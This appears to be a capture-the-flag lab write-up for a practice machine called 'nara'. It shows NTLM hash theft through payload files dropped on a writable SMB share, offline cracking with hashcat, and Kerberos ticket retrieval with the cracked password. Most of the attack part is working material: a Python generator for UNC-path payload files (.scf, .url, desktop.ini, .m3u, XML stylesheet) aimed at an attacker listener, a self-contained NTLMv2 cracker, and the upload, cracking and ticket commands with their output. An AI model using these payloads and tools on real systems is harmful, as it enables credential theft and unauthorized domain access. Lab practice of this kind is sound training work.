Phishing


Important.txt in the nara share on nara.nara-security.com (192.168.209.30) states that the Documents directory of that share is a shared folder employees are encouraged to check regularly. The share also accepts unauthenticated writes (the upload below uses -U kali -N, i.e. no password), so this is an ideal file-based phishing drop: any file whose icon, template, stylesheet or playlist entry resolves to a UNC path will make a browsing user's Windows client connect to an attacker-controlled SMB listener and authenticate with NTLM.

┌──(kali㉿kali)-[~/…/PG_PRACTICE/nara/phishing/payload]
└─$ smbclient //nara.nara-security.com/nara -U kali -N -c 'prompt; cd Documents; mput *'          
lpcfg_do_global_parameter: WARNING: The "syslog" option is deprecated
putting file payload-(remotetemplate).docx as \Documents\payload-(remotetemplate).docx (282.1 kb/s) (average 282.1 kb/s)
putting file payload-(externalcell).xlsx as \Documents\payload-(externalcell).xlsx (93.9 kb/s) (average 206.6 kb/s)
putting file payload-(stylesheet).xml as \Documents\payload-(stylesheet).xml (2.5 kb/s) (average 146.1 kb/s)
putting file payload-(url).url as \Documents\payload-(url).url (1.0 kb/s) (average 115.0 kb/s)
putting file payload.pdf as \Documents\payload.pdf (12.6 kb/s) (average 96.6 kb/s)
putting file payload.wax as \Documents\payload.wax (0.9 kb/s) (average 81.3 kb/s)
putting file payload-(includepicture).docx as \Documents\payload-(includepicture).docx (123.2 kb/s) (average 88.4 kb/s)
putting file payload.application as \Documents\payload.application (26.5 kb/s) (average 81.4 kb/s)
putting file payload-(frameset).docx as \Documents\payload-(frameset).docx (120.3 kb/s) (average 86.6 kb/s)
putting file Autorun.inf as \Documents\Autorun.inf (1.4 kb/s) (average 79.2 kb/s)
putting file payload.lnk as \Documents\payload.lnk (34.6 kb/s) (average 75.6 kb/s)
putting file payload-(icon).url as \Documents\payload-(icon).url (1.8 kb/s) (average 70.1 kb/s)
putting file payload.htm as \Documents\payload.htm (1.3 kb/s) (average 65.2 kb/s)
putting file payload.scf as \Documents\payload.scf (1.5 kb/s) (average 61.1 kb/s)
putting file payload.rtf as \Documents\payload.rtf (1.7 kb/s) (average 57.5 kb/s)
putting file payload.jnlp as \Documents\payload.jnlp (1.8 kb/s) (average 52.2 kb/s)
putting file payload.asx as \Documents\payload.asx (2.3 kb/s) (average 49.4 kb/s)
putting file desktop.ini as \Documents\desktop.ini (0.8 kb/s) (average 46.9 kb/s)
putting file payload-(fulldocx).xml as \Documents\payload-(fulldocx).xml (339.2 kb/s) (average 89.9 kb/s)
putting file zoom-attack-instructions.txt as \Documents\zoom-attack-instructions.txt (0.6 kb/s) (average 79.2 kb/s)
putting file payload.m3u as \Documents\payload.m3u (0.5 kb/s) (average 74.6 kb/s)

All payloads delivered into Documents. The file set matches the full output of the ntlm_theft generator; each file type triggers an outbound SMB (or WebDAV) connection to the listener either when Explorer renders the folder listing (scf, url, desktop.ini), when the user opens the file (lnk, m3u, asx, wax, htm, pdf, jnlp, application) or when Office resolves the embedded remote resource (docx, xlsx, rtf, xml). Which of them actually fires depends on the client's Windows build and which application opens the file, which is why the whole set is dropped rather than a single file.
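As an added illustration (example code, not the author's payload set or the ntlm_theft project's code), the following builds the text-based members of that file list. The listener address 192.0.2.10 is an assumed placeholder, since the page never shows the Kali IP; the binary formats (.lnk, the Office documents) are omitted. Each file points an icon, stylesheet or playlist entry at a UNC path on the listener, which is what makes Explorer, Media Player or an XML viewer authenticate outbound.

```python
from pathlib import Path

# Assumed placeholder for the attacker's SMB listener (not shown on the page).
LISTENER = "192.0.2.10"


def unc(host: str, name: str) -> str:
    """UNC path to a resource on the listener; resolving it triggers NTLM auth."""
    return f"\\\\{host}\\share\\{name}"


def build_payloads(host: str = LISTENER) -> dict:
    """Return {filename: content} for the text-based payload types.

    INI-style files use CRLF line endings, as the Windows parsers expect.
    """
    crlf = "\r\n"
    return {
        # Explorer resolves IconFile while rendering the folder listing.
        "payload.scf": crlf.join([
            "[Shell]", "Command=2", f"IconFile={unc(host, 'icon.ico')}",
            "[Taskbar]", "Command=ToggleDesktop", "",
        ]),
        # Internet shortcut whose icon lives on the listener.
        "payload-(icon).url": crlf.join([
            "[InternetShortcut]", "URL=https://example.invalid/",
            f"IconFile={unc(host, 'icon.ico')}", "IconIndex=1", "",
        ]),
        # Only honoured when the containing folder carries the System or
        # Read-only attribute, so it is the least reliable of the set.
        "desktop.ini": crlf.join([
            "[.ShellClassInfo]", f"IconResource={unc(host, 'icon.ico')},0", "",
        ]),
        # Playlist entry; fires when the user opens it in Windows Media Player.
        "payload.m3u": unc(host, "track.mp3") + crlf,
        # XML whose stylesheet is fetched from the listener on open.
        "payload-(stylesheet).xml": (
            '<?xml version="1.0" encoding="UTF-8"?>' + crlf
            + f'<?xml-stylesheet type="text/xsl" href="{unc(host, "style.xsl")}"?>' + crlf
            + "<root/>" + crlf
        ),
    }


def write_payloads(directory: str, host: str = LISTENER) -> list:
    """Write the payload files into `directory` and return the paths written."""
    out = Path(directory)
    out.mkdir(parents=True, exist_ok=True)
    written = []
    for name, content in build_payloads(host).items():
        path = out / name
        path.write_bytes(content.encode("utf-8"))
        written.append(str(path))
    return written


if __name__ == "__main__":
    # Produces a local "payload" directory ready for `smbclient ... mput *`.
    for p in write_payloads("payload"):
        print("wrote", p)
```

The generated directory is what the smbclient mput above would push; the listener must be up before the upload, because the first trigger is Explorer rendering the folder the moment someone browses it.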

The listener logged an inbound SMB authentication from tracy.white, a valid domain user; the captured NetNTLMv2 challenge-response was saved to tracy.white.hash for offline cracking.

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ hashcat --show ./tracy.white.hash                              
 
5600 | NetNTLMv2 | Network Protocol
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ hashcat -a 0 -m 5600 ./tracy.white.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
TRACY.WHITE::NARASEC:aaaaaaaaaaaaaaaa:e4cbdb79bb157f0ed52b9ae83cafb158:...:zqwj041FGX
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: TRACY.WHITE::NARASEC:aaaaaaaaaaaaaaaa:e4cbdb79bb157...000000
Time.Started.....: Tue Jul  1 15:02:56 2025 (0 secs)
Time.Estimated...: Tue Jul  1 15:02:56 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  4118.7 kH/s (1.76ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2482176/14344385 (17.30%)
Rejected.........: 0/2482176 (0.00%)
Restore.Point....: 2469888/14344385 (17.22%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: zz332891 -> zozotareq100100
Hardware.Mon.#1..: Util: 33%
 
Started: Tue Jul  1 15:02:55 2025
Stopped: Tue Jul  1 15:02:58 2025

tracy.white's NetNTLMv2 hash cracks to zqwj041FGX in about three seconds, with no rules applied and the candidate found roughly 17% of the way through rockyou.txt: the password is in a public wordlist, which a password policy banning known-breached values would have caught.
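To make the hashcat step concrete, here is an added example (not from the original writeup) that implements exactly what mode 5600 checks: NT hash = MD4(UTF-16LE(password)), NTLMv2 hash = HMAC-MD5(NT hash, UPPER(user) + domain), NTProofStr = HMAC-MD5(NTLMv2 hash, server challenge + blob). It parses the USER::DOMAIN:challenge:proof:blob line format, and because the blob of the real capture is not reproduced on this page, it builds its own line from the page's user, domain, server challenge and cracked password with a constructed client challenge and target info, then cracks that line against a tiny wordlist. MD4 is implemented inline because hashlib on OpenSSL 3 builds frequently refuses to provide it.

```python
import hmac
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); needed because many hashlib builds lack it."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    # (boolean function, additive constant, message-word order, shifts) per round
    rounds = [
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        v = h[:]
        for fn, k, order, shifts in rounds:
            for i in range(16):
                j = (-i) % 4  # which of a,b,c,d this step rewrites (a,d,c,b,...)
                mix = fn(v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4])
                v[j] = _rotl((v[j] + mix + X[order[i]] + k) & 0xFFFFFFFF, shifts[i % 4])
        h = [(a + b) & 0xFFFFFFFF for a, b in zip(h, v)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    # NTOWFv2: user name upper-cased, domain exactly as the client sent it
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof(v2hash: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(v2hash, server_challenge + blob, "md5").digest()


def av_pairs(domain: str, computer: str) -> bytes:
    """Minimal target-info: NbDomainName (2), NbComputerName (1), EOL (0)."""
    def pair(avid: int, text: str) -> bytes:
        v = text.encode("utf-16-le")
        return struct.pack("<HH", avid, len(v)) + v
    return pair(2, domain) + pair(1, computer) + struct.pack("<HH", 0, 0)


def build_5600(user: str, domain: str, password: str, server_challenge: bytes,
               client_challenge: bytes, target_info: bytes) -> str:
    """Produce a hashcat 5600 line as Responder would, from a known password."""
    # NTLMv2 blob: version 0x0101, 6 reserved, FILETIME (0 here), client nonce,
    # 4 reserved, AV pairs, 4 reserved
    blob = (struct.pack("<BBHI", 1, 1, 0, 0) + struct.pack("<Q", 0) + client_challenge
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    proof = nt_proof(ntlmv2_hash(password, user, domain), server_challenge, blob)
    return f"{user.upper()}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_5600(line: str) -> dict:
    user, _lm, domain, chal, proof, blob = line.strip().split(":", 5)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(chal),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack_5600(line: str, wordlist) -> "str | None":
    """Return the first candidate whose recomputed NTProofStr matches, else None."""
    h = parse_5600(line)
    for pw in wordlist:
        guess = nt_proof(ntlmv2_hash(pw, h["user"], h["domain"]), h["challenge"], h["blob"])
        if hmac.compare_digest(guess, h["proof"]):
            return pw
    return None


if __name__ == "__main__":
    # Constructed line: page's user, domain, challenge and password; nonce and
    # target info are made up, so the NTProofStr differs from the real capture.
    line = build_5600("tracy.white", "NARASEC", "zqwj041FGX",
                      bytes.fromhex("aaaaaaaaaaaaaaaa"), bytes.fromhex("0102030405060708"),
                      av_pairs("NARASEC", "NARA"))
    print(line)
    print("cracked:", crack_5600(line, ["123456", "password", "zqwj041FGX"]))
```

Two practitioner notes fall out of the code: the NTLMv2 hash depends on the domain string as captured, so a line with the wrong domain case will never crack; and the NTProofStr is a plain HMAC-MD5 over a client-chosen blob, which is why a single captured exchange is enough for unlimited offline guessing and why the hash does not need to be relayed to be useful.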

Validation


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT NARA-SECURITY.COM/tracy.white@nara.nara-security.com -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: zqwj041FGX
[*] Saving ticket in tracy.white@nara.nara-security.com.ccache

The KDC on the DC (nara.nara-security.com, 192.168.209.30) issued a TGT for tracy.white, confirming that the cracked password is valid for a live domain account: Kerberos pre-authentication succeeded, so the account is neither disabled nor locked out. Impacket tools will use the saved ccache when KRB5CCNAME points at it and they are invoked with -k -no-pass, which avoids sending the password again over NTLM.